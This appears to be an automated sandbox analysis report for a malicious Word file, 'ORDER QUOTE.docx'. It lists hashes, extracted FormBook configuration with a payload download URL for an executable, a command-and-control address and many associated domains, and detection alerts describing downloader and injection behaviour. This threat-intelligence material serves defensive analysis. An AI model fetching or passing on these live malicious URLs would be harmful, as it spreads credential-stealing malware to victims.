General
-
Target
ORDER QUOTE.docx
-
Size
10KB
-
Sample
210922-y5s8msgdem
-
MD5
eee70c12ab889fd6173de81fbc9a6817
-
SHA1
673a841da220e5ba72e5f30d1d566569595ed352
-
SHA256
7c41d53d6dd4f2979bfcdea462feef025b2f31cf55644f927ece5f4699a1b7a9
-
SHA512
7647f0d5adcd468a6cbae4900ecb2887de0a0f89ba25893379f905f04b7b9ee0fa89af755c8cb1db8e4d613f11a8f9f80334de3e784677d1fac1ad51cc9db8d7
Static task
static1
Behavioral task
behavioral1
Sample
ORDER QUOTE.docx
Resource
win7v20210408
Behavioral task
behavioral2
Sample
ORDER QUOTE.docx
Resource
win10-en-20210920
Malware Config
Extracted
http://cml.lol/olxqqy
Extracted
http://198.46.199.161/joo/vbc.exe
Extracted
formbook
4.1
m8g0
http://www.psicologarenatacruz.com/m8g0/
trypapaya.pro
instructorcornernet.com
techadvisorsfl.com
raunnan.com
filestune.com
learnitanywhereskills.com
beaullife.com
getcovidwear.com
tkrbeautyinstitut.com
lisaphamkhai.com
iconicdds.com
ksoopawlas.com
testosteron.store
jctaketwo.com
awexz.online
onlinening.com
steelwerkschicago.com
lukakordic.com
expertsofcoaching.com
dashcca.com
xn--demiatdirecto-1ib.com
yuhongicm.com
portlandsiege.com
academysta.com
blackwiremedia.com
kent-ro-service.com
awmarkets.com
speleatherware.com
rehabcenters.space
jioscircle.com
sinijitu.com
analyticsyoda.com
shlqjt.com
bikramyogamarietta.com
crowncasino9.com
smokin-balls.com
shirasu-clinic.com
856379912.xyz
ckatesting.club
dideqsa.com
goodreporters.com
bromosyon.com
ilkonceyayincilik.com
domennyarendi32.net
thegrowthinn.com
qsgasia.com
venolbolivia.com
myhalloweengift.com
deeparchivesport.com
stiltedstories.com
btcdonation.info
little-darling.com
maximumpotentialfitness.net
iading.com
datingwithgusto.com
abncustompainting.com
cropadvisorjobs.com
nanoring.info
best-practice-gastro.com
sellitech.net
mixonsolutions.com
throughthelineagency.com
gtat.pro
relicstudios.net
Targets
-
-
Target
ORDER QUOTE.docx
-
Size
10KB
-
MD5
eee70c12ab889fd6173de81fbc9a6817
-
SHA1
673a841da220e5ba72e5f30d1d566569595ed352
-
SHA256
7c41d53d6dd4f2979bfcdea462feef025b2f31cf55644f927ece5f4699a1b7a9
-
SHA512
7647f0d5adcd468a6cbae4900ecb2887de0a0f89ba25893379f905f04b7b9ee0fa89af755c8cb1db8e4d613f11a8f9f80334de3e784677d1fac1ad51cc9db8d7
-
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Formbook Payload
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Executes dropped EXE
-
Abuses OpenXML format to download file from external location
-
Loads dropped DLL
-
Uses the VBS compiler for execution
-
Drops file in System32 directory
-
Suspicious use of SetThreadContext
-